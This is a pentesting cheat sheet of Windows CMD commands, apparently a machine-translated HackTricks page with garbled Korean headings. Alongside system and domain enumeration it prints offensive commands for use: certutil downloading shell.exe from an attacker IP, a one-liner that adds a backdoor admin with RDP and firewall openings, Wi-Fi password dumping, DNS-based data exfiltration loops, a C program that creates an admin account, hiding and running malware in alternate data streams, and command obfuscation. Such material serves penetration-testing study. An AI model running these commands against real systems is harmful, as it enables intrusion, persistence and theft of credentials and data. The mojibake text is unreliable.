# Basic Win CMD for Pentesters
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** ๐ฌ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** ๐ฆ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
## ์์คํ
์ ๋ณด
### ๋ฒ์ ๋ฐ ํจ์น ์ ๋ณด
```bash
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic computersystem LIST full #Get PC info
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic qfe list brief #Updates
hostname
DRIVERQUERY #3rd party driver vulnerable?
```
### ํ๊ฒฝ
```bash
set #List all environment variables
```
Some env variables to highlight:
* **COMPUTERNAME**: ์ปดํจํฐ ์ด๋ฆ
* **TEMP/TMP:** ์์ ํด๋
* **USERNAME:** ์ฌ์ฉ์ ์ด๋ฆ
* **HOMEPATH/USERPROFILE:** ํ ๋๋ ํ ๋ฆฌ
* **windir:** C:\Windows
* **OS**:Windows OS
* **LOGONSERVER**: ๋๋ฉ์ธ ์ปจํธ๋กค๋ฌ ์ด๋ฆ
* **USERDNSDOMAIN**: DNS์ ํจ๊ป ์ฌ์ฉํ ๋๋ฉ์ธ ์ด๋ฆ
* **USERDOMAIN**: ๋๋ฉ์ธ ์ด๋ฆ
```bash
nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC
```
### ๋ง์ดํธ๋ ๋์คํฌ
```bash
(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
wmic logicaldisk get caption,description,providername
```
### [๋ํ๋](authentication-credentials-uac-and-efs/#defender)
### ํด์งํต
```bash
dir C:\$Recycle.Bin /s /b
```
### ํ๋ก์ธ์ค, ์๋น์ค ๋ฐ ์ํํธ์จ์ด
```bash
schtasks /query /fo LIST /v #Verbose out of scheduled tasks
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
tasklist /V #List processes
tasklist /SVC #links processes to started services
net start #Windows Services started
wmic service list brief #List services
sc query #List of services
dir /a "C:\Program Files" #Installed software
dir /a "C:\Program Files (x86)" #Installed software
reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software
```
## ๋๋ฉ์ธ ์ ๋ณด
```bash
# Generic AD info
echo %USERDOMAIN% #Get domain name
echo %USERDNSDOMAIN% #Get domain name
echo %logonserver% #Get name of the domain controller
set logonserver #Get name of the domain controller
set log #Get name of the domain controller
gpresult /V # Get current policy applied
wmic ntdomain list /format:list #Displays information about the Domain and Domain Controllers
# Users
dsquery user #Get all users
net user /domain #List all users of the domain
net user /domain #Get information about that user
net accounts /domain #Password and lockout policy
wmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #Get all users
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET # Get info of 1 users
wmic sysaccount list /format:list #ย Dumps information about any system accounts that are being used as service accounts.
# Groups
net group /domain #List of domain groups
net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the group "Domain Admins" is included here)
net group "Domain Admins" /domain #List users with domain admin privileges
net group "domain computers" /domain #List of PCs connected to the domain
net group "Domain Controllers" /domain #List PC accounts of domains controllers
wmic group list /format:list # Information about all local groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #Get all groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group
wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #Members of the group
# Computers
dsquery computer #Get all computers
net view /domain #Lis of PCs of the domain
nltest /dclist: #List domain controllers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #All computers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #All computers
# Trust relations
nltest /domain_trusts #Mapping of the trust relationships
# Get all objects inside an OU
dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"
```
### ๋ก๊ทธ ๋ฐ ์ด๋ฒคํธ
```bash
#Make a security query using another credentials
wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321
```
## ์ฌ์ฉ์ ๋ฐ ๊ทธ๋ฃน
### ์ฌ์ฉ์
```bash
#Me
whoami /all #All info about me, take a look at the enabled tokens
whoami /priv #Show only privileges
# Local users
net users #All users
dir /b /ad "C:\Users"
net user %username% #Info about a user (me)
net accounts #Information about password requirements
wmic USERACCOUNT Get Domain,Name,Sid
net user /add [username] [password] #Create user
# Other users looged
qwinsta #Anyone else logged in?
#Lauch new cmd.exe with new creds (to impersonate in network)
runas /netonly /user\ "cmd.exe" ::The password will be prompted
#Check current logon session as administrator using logonsessions from sysinternals
logonsessions.exe
logonsessions64.exe
```
### ๊ทธ๋ฃน
```bash
#Local
net localgroup #All available groups
net localgroup Administrators #Info about a group (admins)
net localgroup administrators [username] /add #Add user to administrators
#Domain
net group /domain #Info about domain groups
net group /domain #Users that belongs to the group
```
### ์ธ์
๋ชฉ๋ก
```
qwinsta
klist sessions
```
### ๋น๋ฐ๋ฒํธ ์ ์ฑ
```
net accounts
```
### ์๊ฒฉ ์ฆ๋ช
```bash
cmdkey /list #List credential
vaultcmd /listcreds:"Windows Credentials" /all #List Windows vault
rundll32 keymgr.dll, KRShowKeyMgr #You need graphical access
```
### ์ฌ์ฉ์์์ ์ง์์ฑ
```bash
# Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN
# Add local user and put them local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD
# Add user to insteresting groups:
net localgroup "Remote Desktop Users" UserLoginName /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add
```
## ๋คํธ์ํฌ
### ์ธํฐํ์ด์ค, ๋ผ์ฐํธ, ํฌํธ, ํธ์คํธ ๋ฐ DNS ์บ์
```bash
ipconfig /all #Info about interfaces
route print #Print available routes
arp -a #Know hosts
netstat -ano #Opened ports?
type C:\WINDOWS\System32\drivers\etc\hosts
ipconfig /displaydns | findstr "Record" | findstr "Name Host"
```
### ๋ฐฉํ๋ฒฝ
```bash
netsh firewall show state # FW info, open ports
netsh advfirewall firewall show rule name=all
netsh firewall show config # FW info
Netsh Advfirewall show allprofiles
NetSh Advfirewall set allprofiles state off #Turn Off
NetSh Advfirewall set allprofiles state on #Trun On
netsh firewall set opmode disable #Turn Off
#How to open ports
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"
#Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #I found that this line is not needed
::sc config TermService start= auto #I found that this line is not needed
::net start Termservice #I found that this line is not needed
#Enable Remote Desktop with wmic
wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
##or
wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"
#Enable Remote assistance:
reg add โHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Serverโ /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable
#Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
::Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
```
### ๊ณต์
```bash
net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares
```
### Wifi
```bash
netsh wlan show profile #AP SSID
netsh wlan show profile key=clear #Get Cleartext Pass
```
### SNMP
```
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
```
### ๋คํธ์ํฌ ์ธํฐํ์ด์ค
```bash
ipconfig /all
```
### ARP ํ
์ด๋ธ
```bash
arp -A
```
## ๋ค์ด๋ก๋
Bitsadmin.exe
```
bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
```
CertReq.exe
```
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
```
Certutil.exe
```
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
```
**`Download`๋ฅผ ๊ฒ์ํ์ฌ ๋ ๋ง์ ์ ๋ณด๋ฅผ ์ฐพ์ผ์ธ์** [**https://lolbas-project.github.io**](https://lolbas-project.github.io/)
## ๊ธฐํ
```bash
cd #Get current dir
cd C:\path\to\dir #Change dir
dir #List current dir
dir /a:h C:\path\to\dir #List hidden files
dir /s /b #Recursive list without shit
time #Get current time
date #Get current date
shutdown /r /t 0 #Shutdown now
type #Cat file
#Runas
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
runas /netonly /user:\ "cmd.exe" ::The password will be prompted
#Hide
attrib +h file #Set Hidden
attrib -h file #Quit Hidden
#Give full control over a file that you owns
icacls /t /e /p :F
icacls /e /r #Remove the permision
#Recursive copy to smb
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win
#exe2bat to transform exe file in bat file
#ADS
dir /r #Detect ADS
more file.txt:ads.txt #read ADS
powershell (Get-Content file.txt -Stream ads.txt)
# Get error messages from code
net helpmsg 32 #32 is the code in that case
```
### ๋ฌธ์ ๋ธ๋๋ฆฌ์คํธ ์ฐํ
```bash
echo %HOMEPATH:~6,-11% #\
who^ami #whoami
```
### DOSfuscation
CMD ๋ผ์ธ์ ๋๋
ํํฉ๋๋ค.
```powershell
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
help
SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
encoding
```
### Listen address ACLs
๊ด๋ฆฌ์ ๊ถํ ์์ด [http://+:80/Temporary\_Listen\_Addresses/](http://+/Temporary\_Listen\_Addresses/)์์ ์์ ํ ์ ์์ต๋๋ค.
```bash
netsh http show urlacl
```
### ์๋ DNS ์
ธ
**๊ณต๊ฒฉ์** (Kali)๋ ๋ค์ ๋ ๊ฐ์ง ์ต์
์ค ํ๋๋ฅผ ์ฌ์ฉํด์ผ ํฉ๋๋ค:
```bash
sudo responder -I #Active
sudo tcpdump -i -A proto udp and dst port 53 and dst ip #Passive
```
#### ํผํด์
**`for /f tokens`** ๊ธฐ๋ฒ: ์ด๋ฅผ ํตํด ๋ช
๋ น์ ์คํํ๊ณ ๊ฐ ์ค์ ์ฒซ ๋ฒ์งธ X ๋จ์ด๋ฅผ ๊ฐ์ ธ์ DNS๋ฅผ ํตํด ์๋ฒ๋ก ์ ์กํ ์ ์์ต๋๋ค.
```bash
for /f %a in ('whoami') do nslookup %a #Get whoami
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a #Get word2
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c #List folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c #List that folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c #Same as last one
#More complex commands
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i #Same as last one
```
์ถ๋ ฅ์ **๋ฆฌ๋ค์ด๋ ํธ**ํ๊ณ , ๊ทธ ํ์ **์ฝ์** ์๋ ์์ต๋๋ค.
```
whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i
```
## C ์ฝ๋์์ CMD ํธ์ถํ๊ธฐ
```c
#include /* system, NULL, EXIT_FAILURE */
// When executed by Administrator this program will create a user and then add him to the administrators group
// i686-w64-mingw32-gcc addmin.c -o addmin.exe
// upx -9 addmin.exe
int main (){
int i;
i=system("net users otherAcc 0TherAcc! /add");
i=system("net localgroup administrators otherAcc /add");
return 0;
}
```
## Alternate Data Streams CheatSheet (ADS/Alternate Data Stream)
**์์ ๋** [**https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f**](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)**์์ ๊ฐ์ ธ์์ต๋๋ค! ๋ ๋ง์ ๋ด์ฉ์ด ์์ต๋๋ค!**
```bash
## Selected Examples of ADS Operations ##
### Adding Content to ADS ###
# Append executable to a log file as an ADS
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
# Download a script directly into an ADS
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
### Discovering ADS Content ###
# List files and their ADS
dir /R
# Use Sysinternals tool to list ADS of a file
streams.exe
### Extracting Content from ADS ###
# Extract an executable stored in an ADS
expand c:\ads\file.txt:test.exe c:\temp\evil.exe
### Executing ADS Content ###
# Execute an executable stored in an ADS using WMIC
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
# Execute a script stored in an ADS using PowerShell
powershell -ep bypass - < c:\temp:ttt
```
{% hint style="success" %}
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
HackTricks ์ง์ํ๊ธฐ
* [**๊ตฌ๋
๊ณํ**](https://github.com/sponsors/carlospolop) ํ์ธํ๊ธฐ!
* **๐ฌ [**๋์ค์ฝ๋ ๊ทธ๋ฃน**](https://discord.gg/hRep4RUj7f) ๋๋ [**ํ
๋ ๊ทธ๋จ ๊ทธ๋ฃน**](https://t.me/peass)์ ์ฐธ์ฌํ๊ฑฐ๋ **ํธ์ํฐ** ๐ฆ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**๋ฅผ ํ๋ก์ฐํ์ธ์.**
* **[**HackTricks**](https://github.com/carlospolop/hacktricks) ๋ฐ [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.**
{% endhint %}